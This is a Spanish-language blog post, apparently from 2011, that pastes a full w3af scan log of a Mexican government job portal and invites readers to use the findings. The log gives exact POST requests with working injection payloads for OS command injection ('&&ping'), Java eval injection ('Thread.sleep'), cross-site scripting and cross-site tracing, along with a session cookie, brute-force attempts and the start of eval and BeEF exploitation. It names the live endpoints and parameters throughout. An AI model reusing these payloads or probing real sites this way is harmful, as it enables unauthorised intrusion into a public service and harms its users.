He aqui otra vulnerabilidad mas ahora en http://www.empleo.gob.mx/wb/BANEM/BANE_inicio
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: grep.collectCookies
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: grep.error500
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Sun 05 Jun 2011 08:55:49 PM CDT] Auto-enabling plugin: grep.getMails
[Sun 05 Jun 2011 08:55:50 PM CDT] Auto-enabling plugin: grep.lang
[Sun 05 Jun 2011 08:56:00 PM CDT] The page language is: es
[Sun 05 Jun 2011 08:56:00 PM CDT] The server header for the remote web server is: "Apache/2.2.13". This information was found in the request with id 16.
[Sun 05 Jun 2011 08:56:04 PM CDT] Starting formAuthBrute plugin execution.
[Sun 05 Jun 2011 08:56:04 PM CDT] Starting basicAuthBrute plugin execution.
[Sun 05 Jun 2011 08:56:04 PM CDT] Found 2 URLs and 4 different points of injection.
[Sun 05 Jun 2011 08:56:04 PM CDT] The list of URLs is:
[Sun 05 Jun 2011 08:56:04 PM CDT] - http://www.empleo.gob.mx/wb/BANEM/BANE_inicio
[Sun 05 Jun 2011 08:56:04 PM CDT] - http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_
[Sun 05 Jun 2011 08:56:04 PM CDT] The list of fuzzable requests is:
[Sun 05 Jun 2011 08:56:04 PM CDT] - http://www.empleo.gob.mx/wb/BANEM/BANE_inicio | Method: GET
[Sun 05 Jun 2011 08:56:04 PM CDT] - http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ | Method: POST | Parameters: (filtroEntidad="-1", Busqueda="Buscar", filtroPalabraClave="", tipoBusqueda="1")
[Sun 05 Jun 2011 08:56:04 PM CDT] - http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ | Method: POST | Parameters: (filtroEntidad="16", Busqueda="Buscar", filtroPalabraClave="", tipoBusqueda="1")
[Sun 05 Jun 2011 08:56:04 PM CDT] - http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ | Method: POST | Parameters: (filtroEntidad="32", Busqueda="Buscar", filtroPalabraClave="", tipoBusqueda="1")
[Sun 05 Jun 2011 08:56:11 PM CDT] The web application sent a persistent cookie.
[Sun 05 Jun 2011 08:56:11 PM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):
[Sun 05 Jun 2011 08:56:11 PM CDT] - The URL: http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Sun 05 Jun 2011 08:58:21 PM CDT] The URL: http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Sun 05 Jun 2011 08:58:21 PM CDT] The mail account: "empleo@stps.gob.mx" was found in:
- http://www.empleo.gob.mx/wb/BANEM/BANE_inicio - In request with id: 1. This information was found in the requests with ids 1 and 18.
- http://www.empleo.gob.mx/wb/BANEM/ - In request with id: 18. This information was found in the requests with ids 1, 18 and 24.
- http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ - In request with id: 24. This information was found in the requests with ids 1, 18 and 24.
[Sun 05 Jun 2011 08:58:21 PM CDT] The server header for the remote web server is: "Apache/2.2.13". This information was found in the request with id 16.
[Sun 05 Jun 2011 08:58:21 PM CDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 19 and 20.
[Sun 05 Jun 2011 08:58:21 PM CDT] The URL: "http://www.empleo.gob.mx/wb/BANEM/BANE_inicio" sent the cookie: "JSESSIONID=AA03CB2843DAAD6383C5BDE48E634B19.banem12; Path=/, BIGipServerPool-Apache-Portal=384870592.20480.0000; path=/". This information was found in the request with id 1.
[Sun 05 Jun 2011 08:58:21 PM CDT] The URL: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_" sent the cookie: "BIGipServerPool-Apache-Portal=384870592.20480.0000; path=/". This information was found in the request with id 24.
[Sun 05 Jun 2011 08:59:40 PM CDT] A possible ReDoS was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=Buscar&tipoBusqueda=a%40a.aaaaaaaaaaaaaaaaaaaaaaXX%21&filtroPalabraClave=5672". The modified parameter was "tipoBusqueda". . Please review manually. This information was found in the request with id 329.
[Sun 05 Jun 2011 09:07:17 PM CDT] A possible OS Commanding was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=%26%26ping+-n+3+localhost&tipoBusqueda=1&filtroPalabraClave=5672". The modified parameter was "Busqueda".Please review manually. This information was found in the request with id 416.
[Sun 05 Jun 2011 09:10:22 PM CDT] eval() input injection was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=Thread.sleep(9000)%3B&Busqueda=Buscar&tipoBusqueda=1&filtroPalabraClave=5672". The modified parameter was "filtroEntidad". . Please review manually. This information was found in the request with id 865.
[Sun 05 Jun 2011 09:14:31 PM CDT] Cross Site Scripting was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=&Busqueda=Buscar&filtroPalabraClave=5672&tipoBusqueda=1". The modified parameter was "filtroEntidad". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 932.
[Sun 05 Jun 2011 09:14:31 PM CDT] Cross Site Scripting was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=
[Sun 05 Jun 2011 09:14:31 PM CDT] Cross Site Scripting was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=Buscar&filtroPalabraClave=
[Sun 05 Jun 2011 09:24:33 PM CDT] The mail account: "empleo@stps.gob.mx" was found in:
- http://www.empleo.gob.mx/wb/BANEM/BANE_inicio - In request with id: 1. This information was found in the requests with ids 1 and 18.
- http://www.empleo.gob.mx/wb/BANEM/ - In request with id: 18. This information was found in the requests with ids 1, 18 and 24.
- http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ - In request with id: 24. This information was found in the requests with ids 1, 18 and 24.
[Sun 05 Jun 2011 09:24:33 PM CDT] Password profiling TOP 100:
[Sun 05 Jun 2011 09:24:33 PM CDT] - [1] Empleo with 16710 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [2] Portal with 13101 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [3] Resultados with 9528 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [4] ofertas with 3585 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [5] laboral with 3573 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [6] origen with 2382 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [7] Busco with 2382 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [8] Ofertas with 2382 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [9] Conoce with 2382 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [10] Ingresa with 2382 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [11] Internet with 2376 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [12] elements with 2370 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [13] This with 2358 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [14] trabajo with 1209 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [15] solid with 1203 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [16] otras with 1197 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [17] SITIO with 1197 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [18] INICIO with 1197 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [19] bolsas with 1197 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [20] MAPA with 1197 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [21] CONTACTO with 1197 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [22] discapacidad with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [23] pida with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [24] personalizada with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [25] correo with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [26] personal with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [27] fecha with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [28] dico with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [29] Centros with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [30] personas with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [31] Vacantes with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [32] venes with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [33] setDefaults with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [34] Talleres with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [35] Kioscos with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [36] these with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [37] blica with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [38] Peri with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [39] Inicio with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [40] ocupaciones with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [41] oferta with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [42] Administraci with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [43] entidad with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [44] defaults with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [45] Laboral with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [46] Ferias with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [47] optional with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [48] buscadores with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [49] adultos with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [50] carpeta with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [51] Urbano with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [52] apply with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [53] array with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [54] size with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [55] electr with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [56] habilidades with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [57] Quejas with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [58] recurso with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [59] Temporal with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [60] Proyecto with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [61] contratado with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [62] consulta with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [63] Consejos with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [64] federativa with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [65] Piloto with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [66] escolaridad with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [67] default with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [68] mayores with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [69] perfil with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [70] nico with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [71] intermediaci with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [72] Movilidad with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [73] regi with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [74] Encuestas with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [75] selectors with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [76] Programa with 1191 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [77] Tlalpan with 1185 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [78] Contacto with 1185 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [79] condiciones with 1185 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [80] Fuentes with 1185 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [81] Acerca with 1185 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [82] show with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [83] presentation with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [84] Regresar with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [85] cannot with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [86] version with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [87] last with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [88] your with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [89] contains with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [90] Microsoft with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [91] Subir with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [92] that with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [93] versions with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [94] browser with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [95] designed with 1179 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [96] Buscar with 819 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [97] sobre with 12 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [98] BAJA with 12 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [99] CALIFORNIA with 12 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] - [100] TABASCO with 6 repetitions.
[Sun 05 Jun 2011 09:24:33 PM CDT] The URL: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_" sent these cookies:
[Sun 05 Jun 2011 09:24:33 PM CDT] - BIGipServerPool-Apache-Portal=384870592.20480.0000; path=/
[Sun 05 Jun 2011 09:24:33 PM CDT] The URL: "http://www.empleo.gob.mx/wb/BANEM/" sent these cookies:
[Sun 05 Jun 2011 09:24:33 PM CDT] - BIGipServerPool-Apache-Portal=502311104.20480.0000; path=/
[Sun 05 Jun 2011 09:24:33 PM CDT] The URL: "http://www.empleo.gob.mx/wb/BANEM/BANE_inicio" sent these cookies:
[Sun 05 Jun 2011 09:24:33 PM CDT] - BIGipServerPool-Apache-Portal=384870592.20480.0000; path=/
[Sun 05 Jun 2011 09:24:33 PM CDT] - JSESSIONID=AA03CB2843DAAD6383C5BDE48E634B19.banem12; Path=/, BIGipServerPool-Apache-Portal=384870592.20480.0000; path=/
[Sun 05 Jun 2011 09:24:33 PM CDT] Finished scanning process.
[Sun 05 Jun 2011 09:25:26 PM CDT] eval exploit plugin is starting.
xsrf:post_xsrf:Cross site request forgery vulnerability
The web server at "http://www.empleo.gob.mx/wb/BANEM/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 1054.
HTTP/1.1 200 OK
transfer-encoding: chunked
set-cookie: BIGipServerPool-Apache-Portal=502311104.20480.0000; path=/
x-pvinfo: [S10204.C6282.A2021.RA2011.G1817.UC086595F].[OT/other.OG/other]
server: Apache/2.2.13
date: Mon, 06 Jun 2011 02:12:33 GMT
content-type: message/http
TRACE /wb/BANEM/ HTTP/1.1
Host: www.empleo.gob.mx
Cookie: Path=/, BIGipServerPool-Apache-Portal=384870592.20480.0000;JSESSIONID=AA03CB2843DAAD6383C5BDE48E634B19.banem12;path=/
Accept: */*
User-agent: w3af.sourceforge.net
X-Forwarded-For: 189.131.135.21
Client-Ip: 189.131.135.21
Surrogate-Capabilities: WA="ESI/1.0", WA="ESI-Inline/1.0"
Accept-Encoding: identity
X-Remote-Addr: 189.131.135.21
X-Client: WA
X-PvMAC: 00:01:D7:AE:B4:81
osCommanding:
A possible OS Commanding was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=%26%26ping+-n+3+localhost&tipoBusqueda=1&filtroPalabraClave=5672". The modified parameter was "Busqueda".Please review manually. This information was found in the request with id 416.
POST http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Host: www.empleo.gob.mx
Cookie: Path=/, BIGipServerPool-Apache-Portal=384870592.20480.0000; JSESSIONID=AA03CB2843DAAD6383C5BDE48E634B19.banem12; path=/;
Content-type: application/x-www-form-urlencoded
filtroEntidad=-1&Busqueda=%26%26ping+-n+3+localhost&tipoBusqueda=1&filtroPalabraClave=5672
eval:eval:eval()input injection vulnerability
eval() input injection was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=Thread.sleep(9000)%3B&Busqueda=Buscar&tipoBusqueda=1&filtroPalabraClave=5672". The modified parameter was "filtroEntidad". . Please review manually. This information was found in the request with id 865.
eval() input injection was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=Thread.sleep(9000)%3B&Busqueda=Buscar&tipoBusqueda=1&filtroPalabraClave=5672". The modified parameter was "filtroEntidad". . Please review manually. This information was found in the request with id 865.
xss:xss:Cross site scripting vulnerability
Cross Site Scripting was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=&Busqueda=Buscar&filtroPalabraClave=5672&tipoBusqueda=1". The modified parameter was "filtroEntidad". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 932.
Cross Site Scripting was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=
Cross Site Scripting was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=Buscar&filtroPalabraClave=5672&tipoBusqueda=". The modified parameter was "tipoBusqueda". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 972.
Cross Site Scripting was found at: "http://www.empleo.gob.mx/wb/BANEM/resultados_de_busqueda_", using HTTP method POST. The sent post-data was: "filtroEntidad=-1&Busqueda=Buscar&filtroPalabraClave=
Exploit: eval: xssBeef.
Hay selas dejo.
Saludos Mundo libre
No hay comentarios:
Publicar un comentario